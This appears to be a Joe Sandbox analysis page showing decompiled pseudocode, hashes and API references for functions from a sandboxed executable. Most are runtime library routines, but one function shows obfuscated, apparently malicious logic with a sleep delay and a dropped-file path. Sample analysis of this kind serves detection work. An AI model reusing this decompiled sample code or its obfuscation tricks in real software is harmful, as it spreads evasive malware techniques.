Instruction ID: 138a82c7d907e59151f6fbd773418d332e55c11abb7dcff532d542cd69a9a531
Opcode Fuzzy Hash: 45d62d2701cc5a3fac4f861f0dca878e0e096dc51b54ec9c20b09697a4fadc86
Instruction Fuzzy Hash: E531E1B6900209DFC710EF68EC859BA7BB9FF95310B11C90EF89583340D738A950EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F76E90 Relevance: 6.1, APIs: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00F76E90(intOrPtr _a4, signed int _a8) {
				long long _v12;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t38;
				void* _t43;
				intOrPtr _t45;
				intOrPtr _t48;

				_t20 = _a8;
				_t48 = _a4;
				 *0xfae5e8 =  *0xfae5e8 +  *0xfa7790;
				_push(_t43);
				if( *(_t48 + 4) >= _t20) {
					L6:
					return 0;
				} else {
					_t32 = _t20 * 4;
					_t45 = E00F7CBC4(_t38, _t43, _t48, _t20 * 4);
					if(_t45 != 0) {
						E00F7C990(_t45, 0, _t32);
						_t24 =  *((intOrPtr*)(_t48 + 8));
						if( *((intOrPtr*)(_t48 + 8)) != 0) {
							E00F7C200(_t45, _t24,  *(_t48 + 4) +  *(_t48 + 4) +  *(_t48 + 4) +  *(_t48 + 4));
							 *0xfae070 =  *0xfae070 -  *0xfa7788;
							E00F7C990( *((intOrPtr*)(_t48 + 8)), 0,  *(_t48 + 4) +  *(_t48 + 4) +  *(_t48 + 4) +  *(_t48 + 4));
							_v12 =  *0xfae220 +  *0xfa7780;
							 *0xfae3c8 =  *0xfae3c8 + _v12;
							E00F7CB4B( *((intOrPtr*)(_t48 + 8)));
							_v12 =  *0xfae078 -  *0xfa7778;
							_v12 =  *0xfae3d8 + _v12;
							 *0xfae074 =  *0xfae074 + _v12;
							 *0xfae3d8 =  *0xfae3d8 -  *0xfa75c8;
						}
						 *(_t48 + 4) = _a8;
						 *((intOrPtr*)(_t48 + 8)) = _t45;
						goto L6;
					} else {
						_t5 = _t45 + 1; // 0x1
						return _t5;
					}
				}
			}

0x00f76e99
0x00f76ea7
0x00f76eaa
0x00f76eb0
0x00f76eb4
0x00f76f94
0x00f76f9c
0x00f76eba
0x00f76eba
0x00f76ec7
0x00f76ece
0x00f76ede
0x00f76ee3
0x00f76eeb
0x00f76efb
0x00f76f0c
0x00f76f20
0x00f76f31
0x00f76f3d
0x00f76f47
0x00f76f5b
0x00f76f67
0x00f76f73
0x00f76f85
0x00f76f85
0x00f76f8e
0x00f76f91
0x00000000
0x00f76ed0
0x00f76ed0
0x00f76ed9
0x00f76ed9
0x00f76ece

APIs

_malloc.LIBCMT ref: 00F76EC2

Part of subcall function 00F7CBC4: __FF_MSGBANNER.LIBCMT ref: 00F7CBDD
Part of subcall function 00F7CBC4: __NMSG_WRITE.LIBCMT ref: 00F7CBE4
Part of subcall function 00F7CBC4: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00F91B2D,00000000,00000001,00000000,?,00F82770,00000018,00FABCE0,0000000C,00F82800), ref: 00F7CC09

_memset.LIBCMT ref: 00F76EDE
_memset.LIBCMT ref: 00F76F20
_free.LIBCMT ref: 00F76F47

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: _memset$AllocateHeap_free_malloc
String ID:
API String ID: 585861054-0
Opcode ID: c3ae84d8d51e60337c4a7b968c04a11b6f9aa426052fb235ce04e0146827d492
Instruction ID: 2c8d2d2850001b9f39c77353aca9959f59a9081a4ba253fe820743b01ff996b2
Opcode Fuzzy Hash: c3ae84d8d51e60337c4a7b968c04a11b6f9aa426052fb235ce04e0146827d492
Instruction Fuzzy Hash: B631E7B0500F0CDBD700EF55FC81A6A7BB4FBCA311F158459E88983214DB74A5B4E752

Uniqueness

Uniqueness Score: -1.00%

Function 00F7D76C Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00F7D76C(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v16;
				char _v20;
				void* _t12;
				signed int _t13;
				int _t16;
				intOrPtr* _t17;
				intOrPtr _t19;
				void* _t29;
				void* _t30;
				void* _t32;
				void* _t36;
				void* _t38;
				void* _t40;

				_t32 = __esi;
				_t30 = __edi;
				_t29 = __edx;
				while(1) {
					_t12 = E00F7CBC4(_t29, _t30, _t32, _a4);
					if(_t12 != 0) {
						break;
					}
					_t13 = E00F7FDDD(_t12, _a4);
					__eflags = _t13;
					if(_t13 == 0) {
						__eflags =  *0xfb0994 & 0x00000001;
						if(( *0xfb0994 & 0x00000001) == 0) {
							 *0xfb0994 =  *0xfb0994 | 0x00000001;
							__eflags =  *0xfb0994;
							_push(1);
							_v8 = "bad allocation";
							E00F7E404(0xfb0988,  &_v8);
							 *0xfb0988 = 0xfa8644;
							E00F863E5( *0xfb0994, 0xfa2c49);
						}
						E00F7E594( &_v20, 0xfb0988);
						_v20 = 0xfa8644;
						_t16 = E00F7E685( &_v20, 0xfaba54);
						asm("int3");
						_t38 = _t36;
						_t40 = _t38;
						_push(_t40);
						__eflags = _v16;
						if(_v16 != 0) {
							_t16 = HeapFree( *0xfb09e0, 0, _v8);
							__eflags = _t16;
							if(__eflags == 0) {
								_push(0xfa8644);
								_t17 = E00F7FA66(__eflags);
								_t19 = E00F7FA24(GetLastError());
								 *_t17 = _t19;
								return _t19;
							}
						}
						return _t16;
					} else {
						continue;
					}
					L13:
				}
				return _t12;
				goto L13;
			}

0x00f7d76c
0x00f7d76c
0x00f7d76c
0x00f7d783
0x00f7d786
0x00f7d78e
0x00000000
0x00000000
0x00f7d779
0x00f7d77f
0x00f7d781
0x00f7d792
0x00f7d7a3
0x00f7d7a5
0x00f7d7a5
0x00f7d7ac
0x00f7d7b4
0x00f7d7bb
0x00f7d7c5
0x00f7d7cb
0x00f7d7d0
0x00f7d7d5
0x00f7d7e3
0x00f7d7e6
0x00f7d7eb
0x00f7d7f1
0x00f7c1f9
0x00f7cb4d
0x00f7cb50
0x00f7cb54
0x00f7cb61
0x00f7cb67
0x00f7cb69
0x00f7cb6b
0x00f7cb6c
0x00f7cb7a
0x00f7cb80
0x00000000
0x00f7cb82
0x00f7cb69
0x00f7cb84
0x00000000
0x00000000
0x00000000
0x00000000
0x00f7d781
0x00f7d791
0x00000000

APIs

_malloc.LIBCMT ref: 00F7D786

Part of subcall function 00F7CBC4: __FF_MSGBANNER.LIBCMT ref: 00F7CBDD
Part of subcall function 00F7CBC4: __NMSG_WRITE.LIBCMT ref: 00F7CBE4
Part of subcall function 00F7CBC4: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00F91B2D,00000000,00000001,00000000,?,00F82770,00000018,00FABCE0,0000000C,00F82800), ref: 00F7CC09

std::exception::exception.LIBCMT ref: 00F7D7BB
std::exception::exception.LIBCMT ref: 00F7D7D5
__CxxThrowException@8.LIBCMT ref: 00F7D7E6

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: 01139d517f3d9580d080870219a72ff6de87f52cc6cd5a79a4b8043511bb9954
Instruction ID: 7ef4290e86a12be63cd67004db9e2ddf2d0a73fcba3262cdc4e4d6ef5fddd427
Opcode Fuzzy Hash: 01139d517f3d9580d080870219a72ff6de87f52cc6cd5a79a4b8043511bb9954
Instruction Fuzzy Hash: 2FF02D7190020967EB44EB54DC43DAE7A745F45328F548167F40CD2293CF758E06BB53

Uniqueness

Uniqueness Score: -1.00%

Function 00F6BFF0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 380
sleepCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00F6BFF0() {
				signed int _v8;
				long long _v12;
				signed int _v16;
				long long _v20;
				intOrPtr _v24;
				signed int _v28;
				long long _v32;
				signed int _v36;
				unsigned int _v40;
				signed int _v44;
				unsigned int _v48;
				char _v76;
				char _v104;
				char _v196;
				char _v252;
				char _v280;
				char _v536;
				char _v816;
				signed int _t76;
				intOrPtr _t79;
				void* _t87;
				unsigned int _t94;
				signed int _t97;
				intOrPtr* _t100;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t105;
				unsigned int _t107;
				void* _t108;
				signed char _t120;
				signed char _t138;
				signed int _t140;
				void _t144;
				unsigned int _t145;
				signed int _t146;
				void* _t152;
				void _t154;
				signed int _t156;
				intOrPtr _t166;
				intOrPtr _t167;
				intOrPtr _t176;
				intOrPtr _t184;
				void* _t194;
				signed int _t195;
				intOrPtr _t196;
				intOrPtr _t197;
				signed int _t205;
				void* _t208;
				signed int _t213;
				unsigned int _t215;
				void* _t217;
				void* _t219;
				signed int _t220;
				signed int _t222;
				void* _t225;
				void* _t226;
				void* _t229;
				void* _t230;
				void* _t231;
				void* _t233;
				void* _t244;
				void* _t247;
				void* _t256;
				long long _t258;
				long long _t267;

				_t76 =  *0xfae0f0; // 0xfafdf6a6
				_v8 = _t76;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				_t258 =  *0xfae248;
				_t146 =  *0xfae440; // 0xeb96
				_v20 = _t258;
				_v8 = _t146;
				asm("fild dword [ebp-0x4]");
				asm("fsubr qword [ebp-0x10]");
				_v20 = _t258 +  *0xfa81c0;
				 *0xfae4e0 =  *0xfae4e0 + _v20;
				 *0xfae440 =  *0xfae440 + 1;
				asm("fld1");
				asm("faddp st1, st0");
				E00F69630( &_v76);
				E00F69630( &_v280);
				_t79 =  *0xfae04c; // 0x0
				if(_t79 - 0x755557cd == 0x6657548) {
					 *0xfae34c =  *0xfae34c + 0x8c3114ec;
				}
				 *0xfae55c = ( *0xfae318 & 0x0000ffff) - 0x70e855f8;
				 *0xfae318 =  *0xfae318 - 1;
				E00F70530(_t79);
				E00F72A80( &_v252);
				asm("fld1");
				asm("fsubp st2, st0");
				asm("fxch st0, st1");
				 *0xfae5e4 = st0;
				_v20 =  *0xfae5e4;
				_t267 =  *0xfae0a0 + _v20;
				 *0xfae45c = E00F7CABC();
				asm("fsubr dword [0xfae0a0]");
				 *0xfae0a0 = _t267;
				E00F6D840(_t267);
				E00F76330( *0xfae318,  &_v816);
				_t152 = E00F6CF90( *0xfae318, _t267, 0x30b4, 0x1f);
				_t226 = _t225 + 0xc;
				_t194 = _t152;
				goto L3;
				while(1) {
					L7:
					 *0xfae430 =  *0xfae430 + ( *0xfae154 & 0x0000ffff) + 0xf98f7552;
					_t94 = E00F7B950(0);
					_t213 = _t195;
					_t195 =  *0xfafb04; // 0x708
					_t145 = _t94;
					_push(_t195);
					_v16 = _t213;
					E00F69970(_t145, _t213,  &_v816);
					_t97 =  *0xfafb04; // 0x708
					_t230 = _t229 + 8;
					_t219 = _t145 - _v40;
					 *0xfae1c4 = ( *0xfae1c4 & 0x0000ffff) + 0x71aaedf6;
					asm("sbb ecx, [ebp-0x20]");
					asm("cdq");
					_v48 = _t145;
					_v44 = _t213;
					_t244 = _t213 - _t195;
					if(_t244 < 0 || _t244 <= 0 && _t219 <= _t97) {
						goto L27;
					}
					_t215 = _t145 >> 9;
					_t22 = _t215 + 0x55; // 0x55
					_t105 = _t22;
					_v24 = _t105;
					if(_t215 == _t105) {
						L26:
						_t195 = _v16;
						_v40 = _t145;
						_v36 = _t195;
						goto L27;
					} else {
						goto L11;
					}
					while(1) {
						L11:
						_t107 = E00F7B950(0);
						_t145 = _t107;
						_t108 = _t107 - _v48;
						_t247 = _t108;
						_t220 = _t195;
						asm("sbb edx, [ebp-0x28]");
						_v16 = _t220;
						_v28 = _t195;
						if(_t247 >= 0 && (_t247 > 0 || _t108 > 0x5a)) {
							_t140 =  *0xfafb04; // 0x708
							_push(_t140);
							E00F69970(_t145, _t215,  &_v816);
							_t205 =  *0xfae268; // 0xd18b
							_v8 = _t205;
							_t230 = _t230 + 8;
							_v48 = _t145;
							asm("fild dword [ebp-0x4]");
							_v44 = _t220;
							_v12 = _t267;
							 *0xfae3bc =  *0xfae380 + _v12 +  *0xfa81b8;
							_t267 =  *0xfae380 +  *0xfa75c8;
							 *0xfae380 = _t267;
						}
						E00F6D540(_t145, _t267,  &_v536, _t215);
						 *0xfae4d0 =  *0xfae4d0 - 1;
						_t196 =  *0xfae0c8; // 0xf6a6
						_t197 =  *0xfae4d0; // 0x6c745516
						 *0xfae0c8 =  *0xfae0c8 + 1;
						_t231 = _t230 + 8;
						if(_t197 - 0x61f83fcc > 0xb433fdfa - _t196) {
							 *0xfae16c =  *0xfae16c + 1;
							_t138 =  *0xfae16c; // 0x93ae
							_v8 = _t138 - 0x5b4a2ac1;
							asm("fild dword [ebp-0x4]");
							_v12 = _t267;
							asm("fsubr qword [ebp-0x8]");
							asm("fcompp");
							asm("fnstsw ax");
							_t267 =  *0xfae448;
							asm("fld1");
							asm("faddp st1, st0");
							 *0xfae448 = _t267;
							_t250 = _t138 & 0x00000005;
							if((_t138 & 0x00000005) == 0) {
							}
						}
						_t221 = E00F6CF90(_t250, _t267, 0x1446, 0xb);
						E00F792C0( &_v536, _t112, _t267,  &_v536, _t112,  &_v76, 0x3aa6);
						E00F76570(0xb, _t221);
						_t222 = E00F75CF0( &_v252, _t250,  &_v76,  &_v536, _t215);
						_v8 = _t222;
						E00F75A00( &_v196);
						_t233 = _t231 + 0x24;
						_t251 = _t222 - 2;
						if(_t222 == 2) {
							_t223 = E00F6CF90(_t251, _t267, 0xf03, 0xc);
							E00F78260( &_v76, _t267, _t121);
							E00F76570(0xc, _t121);
							E00F7B1F0( &_v76, _t267,  &_v252);
							_t267 =  *0xfae518;
							 *0xfae610 = E00F7CABC();
							E00F64A10( &_v76, _t251, _t267, 0x3d);
							_t184 =  *0xfafc34; // 0x2731230
							E00F7B1F0( &_v76, _t267, E00F6DE60(_t145, _t184, _t251,  &_v104));
							E00F73030( &_v104, _t215, _t223);
							_t224 = E00F6CF90(_t251, _t267, 0x1446, 0xb);
							E00F792C0( &_v76, _t131, _t267,  &_v536, _t131,  &_v76, 0);
							E00F76570(0xb, _t224);
							E00F75CF0( &_v252, _t251,  &_v76,  &_v536, _t215);
							E00F75A00( &_v196);
							_t222 = _v8;
							_t233 = _t233 + 0x34;
						}
						E00F7C990( &_v536, 0, 0x100);
						_t230 = _t233 + 0xc;
						if(_t222 != 0) {
							goto L26;
						}
						_t195 =  *0xfae340; // 0x1a61
						 *0xfae340 =  *0xfae340 + 1;
						if(_t195 <= 0xcfc0e647) {
							_t176 =  *0xfae5d8; // 0x39ee
							_t195 = _t176 - 0x280cea4a;
							_v8 = _t195;
							asm("fild dword [ebp-0x4]");
							_v12 = _t267;
							_t120 =  *0xfae574; // 0x18b5f23a
							asm("fsubr qword [ebp-0x8]");
							_v8 = 0xbab49535 - _t120;
							_v32 =  *0xfae560;
							asm("fild dword [ebp-0x4]");
							asm("fcomp qword [ebp-0x1c]");
							asm("fnstsw ax");
							_t267 =  *0xfae560 +  *0xfa75c8;
							 *0xfae560 = _t267;
							__eflags = _t120 & 0x00000041;
							if(__eflags == 0) {
								_t267 =  *0xfae1a8;
								st0 = _t267;
							}
						} else {
							st0 =  *0xfae370;
							st0 =  *0xfae1c8;
							_t267 =  *0xfae370 -  *0xfa75c8;
							 *0xfae370 = _t267;
						}
						_t215 = _t215 + 1;
						_t254 = _t215 - _v24;
						if(_t215 != _v24) {
							continue;
						} else {
							goto L26;
						}
					}
					goto L26;
					L27:
					E00F6CB90( &_v76, _t254);
					asm("fld1");
					asm("fsubp st1, st0");
					_v32 =  *0xfae168;
					_t267 =  *0xfae078 + _v32;
					 *0xfae078 = _t267;
					Sleep(0x8ae);
					_t166 =  *0xfb04a4; // 0x27311e0
					E00F6AF90(_t166);
					_t100 =  *0xfb04b0; // 0x2731180
					_t101 = E00F72E30(_t100);
					_t229 = _t230 + 4;
					if(_t101 == 0) {
						_t256 =  *0xfafc2c - _t101; // 0x0
						if(_t256 == 0) {
							E00F66260(_t267, "C:\helrrxxyrxmppnn\lxugwbfrq.exe", 0xfb0518);
							_t229 = _t229 + 8;
						}
						_t102 =  *0xfae47c; // 0xd2bf0293
						_t167 =  *0xfae350; // 0xdea3a412
						_v24 = _t167 + _t102 + 0xb5e5dd5d;
						asm("fild dword [ebp-0x14]");
						_v32 = _t267;
						_t267 =  *0xfae528 + _v32;
						 *0xfae528 = _t267;
						 *0xfae350 =  *0xfae350 + 1;
					}
				}
				L5:
				_t154 =  *(_t208 + 1);
				_t208 = _t208 + 1;
				if(_t154 != 0) {
					goto L5;
				} else {
					_t156 = _t195 >> 2;
					_t87 = memcpy(_t208, _t217, _t156 << 2);
					memcpy(_t217 + _t156 + _t156, _t217, _t195 & 0x00000003);
					E00F76570(0x1f, _t87);
					_t229 = _t226 + 0x20;
					_v40 = 0;
					_v36 = 0;
					goto L7;
				}
				L3:
				_t144 =  *_t152;
				_t152 = _t152 + 1;
				if(_t144 != 0) {
					goto L3;
				} else {
					_t217 = _t194;
					_t195 = _t152 - _t194;
					_t208 =  &_v816 - 1;
					goto L5;
				}
			}

0x00f6bfff
0x00f6c004
0x00f6c007
0x00f6c00d
0x00f6c015
0x00f6c01b
0x00f6c022
0x00f6c028
0x00f6c02e
0x00f6c031
0x00f6c03a
0x00f6c046
0x00f6c04c
0x00f6c059
0x00f6c05b
0x00f6c063
0x00f6c06e
0x00f6c073
0x00f6c088
0x00f6c08a
0x00f6c08a
0x00f6c0a1
0x00f6c0a8
0x00f6c0af
0x00f6c0ba
0x00f6c0c5
0x00f6c0c9
0x00f6c0cb
0x00f6c0cd
0x00f6c0d9
0x00f6c0e2
0x00f6c0ea
0x00f6c0ef
0x00f6c0f5
0x00f6c0fb
0x00f6c107
0x00f6c118
0x00f6c11a
0x00f6c11d
0x00f6c11d
0x00f6c160
0x00f6c160
0x00f6c16f
0x00f6c177
0x00f6c17c
0x00f6c17e
0x00f6c184
0x00f6c186
0x00f6c18e
0x00f6c191
0x00f6c19d
0x00f6c1a8
0x00f6c1ad
0x00f6c1b0
0x00f6c1b9
0x00f6c1bc
0x00f6c1bd
0x00f6c1c0
0x00f6c1c3
0x00f6c1c5
0x00000000
0x00000000
0x00f6c1d7
0x00f6c1da
0x00f6c1da
0x00f6c1dd
0x00f6c1e2
0x00f6c4d8
0x00f6c4d8
0x00f6c4db
0x00f6c4de
0x00000000
0x00000000
0x00000000
0x00000000
0x00f6c1e8
0x00f6c1e8
0x00f6c1ea
0x00f6c1ef
0x00f6c1f1
0x00f6c1f1
0x00f6c1f4
0x00f6c1f6
0x00f6c1f9
0x00f6c1fc
0x00f6c1ff
0x00f6c208
0x00f6c20d
0x00f6c215
0x00f6c21a
0x00f6c224
0x00f6c227
0x00f6c22a
0x00f6c22d
0x00f6c230
0x00f6c233
0x00f6c245
0x00f6c251
0x00f6c257
0x00f6c257
0x00f6c265
0x00f6c26a
0x00f6c270
0x00f6c27a
0x00f6c28c
0x00f6c299
0x00f6c29e
0x00f6c2a0
0x00f6c2a7
0x00f6c2b6
0x00f6c2b9
0x00f6c2bc
0x00f6c2c5
0x00f6c2ce
0x00f6c2d0
0x00f6c2d2
0x00f6c2d8
0x00f6c2da
0x00f6c2dc
0x00f6c2e2
0x00f6c2e5
0x00f6c2e5
0x00f6c2e5
0x00f6c308
0x00f6c312
0x00f6c31a
0x00f6c33f
0x00f6c342
0x00f6c345
0x00f6c34a
0x00f6c34d
0x00f6c350
0x00f6c365
0x00f6c36b
0x00f6c373
0x00f6c385
0x00f6c38a
0x00f6c39a
0x00f6c39f
0x00f6c3a8
0x00f6c3b7
0x00f6c3bf
0x00f6c3d5
0x00f6c3e0
0x00f6c3e8
0x00f6c402
0x00f6c40e
0x00f6c413
0x00f6c416
0x00f6c416
0x00f6c427
0x00f6c42c
0x00f6c431
0x00000000
0x00000000
0x00f6c437
0x00f6c43e
0x00f6c44d
0x00f6c473
0x00f6c47d
0x00f6c483
0x00f6c48b
0x00f6c48e
0x00f6c497
0x00f6c49c
0x00f6c4a1
0x00f6c4a4
0x00f6c4a7
0x00f6c4aa
0x00f6c4ad
0x00f6c4b5
0x00f6c4bb
0x00f6c4c1
0x00f6c4c4
0x00f6c4c6
0x00f6c4cc
0x00f6c4cc
0x00f6c44f
0x00f6c455
0x00f6c45d
0x00f6c465
0x00f6c46b
0x00f6c46b
0x00f6c4ce
0x00f6c4cf
0x00f6c4d2
0x00000000
0x00000000
0x00000000
0x00000000
0x00f6c4d2
0x00000000
0x00f6c4e1
0x00f6c4e4
0x00f6c4ef
0x00f6c4f6
0x00f6c504
0x00f6c50d
0x00f6c510
0x00f6c516
0x00f6c51c
0x00f6c522
0x00f6c527
0x00f6c52d
0x00f6c532
0x00f6c537
0x00f6c53d
0x00f6c543
0x00f6c54f
0x00f6c554
0x00f6c554
0x00f6c557
0x00f6c55c
0x00f6c569
0x00f6c56c
0x00f6c56f
0x00f6c578
0x00f6c57b
0x00f6c581
0x00f6c581
0x00f6c537
0x00f6c134
0x00f6c134
0x00f6c137
0x00f6c13a
0x00000000
0x00f6c13c
0x00f6c13e
0x00f6c141
0x00f6c14b
0x00f6c14d
0x00f6c152
0x00f6c157
0x00f6c15a
0x00000000
0x00f6c15a
0x00f6c120
0x00f6c120
0x00f6c122
0x00f6c125
0x00000000
0x00f6c127
0x00f6c12f
0x00f6c131
0x00f6c133
0x00000000
0x00f6c133

APIs

_memset.LIBCMT ref: 00F6C427
Sleep.KERNEL32(000008AE), ref: 00F6C516

Strings

C:\helrrxxyrxmppnn\lxugwbfrq.exe, xrefs: 00F6C54A

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: Sleep_memset
String ID: C:\helrrxxyrxmppnn\lxugwbfrq.exe
API String ID: 128483028-252428944
Opcode ID: b99ba4d54689aaf517b2d44312f58c9db82f75f387eff633663c93606fcdc593
Instruction ID: 44335ae9506ecca28ee5b74550aa6b199f1e7f071961b846abe5f0ca469659ce
Opcode Fuzzy Hash: b99ba4d54689aaf517b2d44312f58c9db82f75f387eff633663c93606fcdc593
Instruction Fuzzy Hash: D3E105B1D0021DDBDB14EFA0EC956FD7BB4FB4A300F04845AE485A32A5EB341A65FB91

Uniqueness

Uniqueness Score: -1.00%

Function 00F86560 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 95%

			E00F86560(void* __edx, void* __edi, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v24;
				signed int _v28;
				void _v32;
				signed int _v36;
				void* _t20;
				signed int _t21;
				void* _t26;
				signed int _t31;
				void* _t35;
				void* _t39;
				void* _t41;

				_t35 = __edx;
				_v36 = _v36 & 0x00000000;
				_t31 = 7;
				_t20 = memset( &_v32, 0, _t31 << 2);
				_pop(_t39);
				_t46 = _a8 - _t20;
				if(_a8 != _t20) {
					_t21 = _a4;
					__eflags = _t21;
					if(__eflags == 0) {
						goto L1;
					} else {
						_v28 = _t21;
						_v36 = _t21;
						_v32 = 0x7fffffff;
						_v24 = 0x42;
						_t26 = E00F8305E(_t35,  &_v36, _a8, _a12, _a16);
						_t15 =  &_v32;
						 *_t15 = _v32 - 1;
						__eflags =  *_t15;
						_t41 = _t26;
						if( *_t15 < 0) {
							E00F863FC(_t35, _t39, 0,  &_v36);
						} else {
							 *_v36 = 0;
						}
						return _t41;
					}
				} else {
					L1:
					 *((intOrPtr*)(E00F7FA66(_t46))) = 0x16;
					return E00F7C1AB() | 0xffffffff;
				}
			}

0x00f86560
0x00f86568
0x00f8656f
0x00f86575
0x00f86577
0x00f86578
0x00f8657b
0x00f86592
0x00f86595
0x00f86597
0x00000000
0x00f86599
0x00f8659d
0x00f865a3
0x00f865ad
0x00f865b4
0x00f865bb
0x00f865c3
0x00f865c3
0x00f865c3
0x00f865c6
0x00f865c8
0x00f865d8
0x00f865ca
0x00f865cd
0x00f865cd
0x00f865e3
0x00f865e3
0x00f8657d
0x00f8657d
0x00f86582
0x00f86591
0x00f86591

APIs

__output_l.LIBCMT ref: 00F865BB

Part of subcall function 00F7FA66: __getptd_noexit.LIBCMT ref: 00F7FA66

Strings

B, xrefs: 00F865B4

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: __getptd_noexit__output_l
String ID: B
API String ID: 2141734944-1255198513
Opcode ID: 6f8002b68bf60a7fd0f5846207362007941de7182ff8108cc2b95ed3867cc4cd
Instruction ID: c6ddf3e74b15565404085554a7d844d6db04eab6a4b410fae4a847ad61aac0b9
Opcode Fuzzy Hash: 6f8002b68bf60a7fd0f5846207362007941de7182ff8108cc2b95ed3867cc4cd
Instruction Fuzzy Hash: 48016171D002199BDF10AFA4CC01BEEBBB4FB04364F144125F924EA2D1E7789600DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F8B8D5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00F8B8D5(signed int* _a4) {
				intOrPtr* _t8;
				intOrPtr _t9;
				signed int* _t13;

				_t8 =  *0xfb12d0; // 0x0
				_t9 =  *_t8;
				if(_t9 == 0) {
					E00F8B0E6(_a4, 1);
					goto L5;
				} else {
					if(_t9 == 0x41) {
						 *0xfb12d0 =  *0xfb12d0 + 1;
						E00F8B4D8(_a4, "{flat}");
						L5:
						return _a4;
					} else {
						_t13 = _a4;
						_t13[1] = _t13[1] & 0xffff00ff;
						 *_t13 =  *_t13 & 0x00000000;
						_t13[1] = 2;
						return _t13;
					}
				}
			}

0x00f8b8da
0x00f8b8df
0x00f8b8e3
0x00f8b916
0x00000000
0x00f8b8e5
0x00f8b8e7
0x00f8b8ff
0x00f8b90a
0x00f8b91b
0x00f8b91f
0x00f8b8e9
0x00f8b8e9
0x00f8b8ec
0x00f8b8f3
0x00f8b8f6
0x00f8b8fb
0x00f8b8fb
0x00f8b8e7

APIs

DName::DName.LIBCMT ref: 00F8B90A
DName::DName.LIBCMT ref: 00F8B916

Strings

{flat}, xrefs: 00F8B905

Memory Dump Source

Source File: 00000001.00000002.371789830.0000000000F61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F60000, based on PE: true

Associated: 00000001.00000002.371784474.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371839967.0000000000FA3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371858410.0000000000FAE000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.371870320.0000000000FB3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f60000_aw1j2ylb8pebwqkliimle.jbxd

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: f98d6c88e85a5a98ab8482d0899e33a43862955eb109159e2e56e5dd7b3326c1
Instruction ID: ad6a50e983f8856a84cf52d8f117f0bb9cc21109f6fcbef970634cd5469fed4a
Opcode Fuzzy Hash: f98d6c88e85a5a98ab8482d0899e33a43862955eb109159e2e56e5dd7b3326c1
Instruction Fuzzy Hash: 1CF0A93124424C9FCB10EF58E895BE43BA4AB42761F088080E64C0F2A2C774E942EBA1

Uniqueness

Uniqueness Score: -1.00%

